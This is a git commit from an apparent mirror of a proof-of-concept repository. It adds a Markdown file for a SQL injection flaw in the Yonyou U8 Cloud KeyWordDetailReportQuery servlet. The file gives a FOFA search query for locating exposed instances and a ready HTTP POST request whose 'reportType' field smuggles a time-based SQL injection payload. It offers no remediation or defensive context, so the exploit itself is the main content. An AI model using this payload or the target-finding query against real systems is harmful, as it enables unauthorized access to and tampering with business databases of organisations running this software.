mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 23:44:52 +08:00
Create 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
This commit is contained in:
parent
1508806444
commit
eee279df55
16
用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
Normal file
16
用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
# 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="用友U8 Cloud"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
|
||||||
|
host:127.0.0.1
|
||||||
|
|
||||||
|
{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user